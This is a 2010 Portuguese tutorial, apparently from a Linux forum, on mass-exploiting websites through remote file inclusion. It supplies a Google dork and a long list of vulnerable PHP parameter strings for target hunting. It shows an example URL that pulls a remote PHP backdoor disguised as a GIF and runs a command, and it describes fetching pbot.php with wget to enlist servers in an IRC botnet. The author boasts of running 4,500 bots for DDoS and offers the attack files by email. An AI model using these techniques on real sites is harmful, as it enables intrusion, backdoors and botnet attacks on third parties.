Explorando vulnerabilidades em websites

Publicado por Vinícius de Oliveira Almeida em 20/09/2010

[ Hits: 30.969 ]

 


Explorando vulnerabilidades em websites



Procurando hosts vulneráveis

A maioria dos crackers utilizam script kiddies (script prontos), aproveitam a ferramenta de pesquisa Google para buscar strings vulneráveis. Existem alguns scanners feitos em Delphi disponíveis na internet que consultam strings diretamente no resultado de pesquisa de sites como Google, Aonde, UOL etc. Após o resultado ser exibido no sistema, o cracker aplica o exploit na lista gerada, efetuando um ataque em massa.

Algumas técnicas são utilizadas diretamente pelo Google como por exemplo:

allinurl: admin?id=

Os hosts mais vulneráveis são sistemas de código fonte aberto, como Joomla, PHP-Nuke, Wordpress etc. Por isso é bacana sempre manter estes aplicativos atualizados, evitando um possível ataque.

Muitos perguntam porque na maioria dos ataques os principais aplicativos afetados são de open source. Logo digo, uma vez que temos acesso a todos os fontes do aplicativo, devido ao amplo conhecimento em programação acharemos falhas.

Strings conhecidas

Algumas strings bastante conhecidas pelos crackers, dificilmente acharemos algum site vulnerável com estas strings, mas vale a pena verificar:

./modules/mod_mainmenu.php?mosConfig_absolute_path=
./include/new-visitor.inc.php?lvc_include_dir=
./path_of_cpcommerce/_functions.php?prefix
./modules/My_eGallery/public/displayCategory.php?basepath=
./modules/4nAlbum/public/displayCategory.php?basepath=
./modules/coppermine/themes/default/theme.php?THEME_DIR=
./modules/agendax/addevent.inc.php?agendax_path=
./shoutbox/expanded.php?conf=
./modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
./pivot/modules/module_db.php?pivot_path=
./library/editor/editor.php?root=
./library/lib.php?root=
./e107/e107_handlers/secure_img_render.php?p=
./main.php?x=
./index.php/main.php?x=
./index.php?include=
./index.php?x=
./index.php?open=
./index.php?visualizar=
./template.php?pagina=
./index.php?pagina=
./index.php?inc=
./index.php?leng=
./index.php?page=
./index.php?rev=
./index.php?main=
./index.php?show=
./index.php?x=
./index.php?inc=
./index.php?menu=
./index.php?aktie=
./index.php?s=
./index.php?p=
./index.php?principal=
./index.php?url=
./index.php?file=
./index.php?do=
./index.php?side=
./index.php?f=
./index.php?display=
./index.php?webpage=
./index.php?content=
./index.php?source=
./index.php?texto=
./index.php?go=
./index.php?contents=
./index.php?meio=
./index.php?miolo=
./index.php?section=
./index.php?configFile=
./index.php?op=
./index.php?id=
./index.php?corpo=
./index.php?article=
./index.php?Itemid=
./index.php?product_id=
./index.php?lang=
./index.php?showtopic=
./index.php?option=
./index.php?link=
./index.php?module=
./index.php?submenu=
./index.php?cat=
./index.php?visualizar=
./index.php?open=
./index.php?include=
./main.php?page=
./main.php?file=
./main.php?ver=
./main.php?dir=
./main.php?side=
./main.php?doc=
./main.php?x=
./main.php?lk=
./main.php?pbody=
./main.php?menu=
./main.php?op=

Atacando alvo exemplo

Uma vez tendo uma string vulnerável ao nosso scanner, darei um exemplo conhecido de um cmd em formato gif:

http://www.exemplo.org/index.php?site=http://www.site_onde_a_cmd.gif_ta.com/cmd.gif?&cmd=id

Veja o link acima e analise que chamamos uma URL remota para execução do nosso gif, em que na verdade o conteúdo deste gif possui códigos em PHP para um backdoor embutido no gif, permitindo que o cracker tenha acesso do sistema pelo usuário do Apache.

Por isso é bom lembrar, não rodem o Apache como root, pois se algum dia sua aplicação for vulnerável o atacante ficará restrito no id do usuário, não prejudicando tanto seu servidor.

Para curiosos, posso passar todos os arquivos por e-mail ou MSN.

MSN: vinicius@srvr.com.br
E-mail: vinicius@idea-planejamento.com

Continuando:

Observe que no final da string temos o comando id. Interessante não é, após a execução desta URL o exploit irá rodar e na tela no browser teremos uma tela para gerenciamento do bash alvo e o resultado do comando id.

Alguns crackers executam outros backdoors através desta string, um exemplo é tornar o alvo zombie do atacante fazendo conexões reversas em servidores de IRC. Como exemplo utilizaremos o PBOT.php.

O atacante coloca na URL um wget baixando o pbot.php, sendo que neste pbot o servidor irá conectar-se remotamente em uma sala de IRC administrado pelo cracker, tornando-se um zombie na espera de um comando..

Uma vez o servidor estando conectado na servidor do IRC, o cracker pode administrar vários alvos ao mesmo tempo, podendo criar ataque em massa chamado botnet.

Conclusão

Eu mesmo utilizo parte desta técnica, pois as strings comentadas neste tutorial são antigas. Atualmente tenho 4.500 bots em meu domínio. Não utilizo esses bots para hacker páginas e danificar sistemas. Utilizo para testes de análise de segurança, ataque DDOS e quebra de criptografias.

O alvo atacado não identifica seu endereço IP, pois quem faz o ataque são os botnet e não você.

Brevemente estarei criando outro artigo explicando como se defender de ataques botnets.

Provo para vocês que muitos sites conhecidos estão vulneráveis a este tipo de ataque.

Caso queira testar seu site, mande um comentário com seu domínio ou me adicione no MSN vinicius@srvr.com.br.

Att
Vinicius
IDEA

Outras dicas deste autor

Estamos seguros no orkut?

Reduzindo o tempo de carregamento de seu site

Myauth 3 - Dois servidores utilizando o mesmo banco de dados

Dúvidas para compilar um kernel?

Exploit dá acesso root em máquina local - kernels 2.6.17 e 2.6.24.1

Leitura recomendada

Debian com KDE - Habilitando cliques do Touchpad

Dicas para iniciar sua vida no mundo GNU/Linux

Instalando e configurando softmodem no Slackware 12

Instalando o flash player do Mozilla Firefox no Slackware Linux

Criando seu próprio repositório do Pypi

  

Comentários
[1] Comentário enviado por fabioqyz em 12/11/2013 - 21:09h

Vinicius,

O site do meu cliente foi invadido, o sujeito conseguiu acessar o admin do site e postou isso em uma das páginas:
Segue link: http://www.welmomoura.com.br/site/pagina_hackeada.html">http://www.welmomoura.com.br/site/pagina_hackeada.html

O link para o admin do site estava explícito na página na ocasião, mas já alterei as senhas e renomeei a pasta do admin.

Poderia verificar pra mim as vulnerabilidades desse site? http://www.welmomoura.com.br/site/

At. Fábio



Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts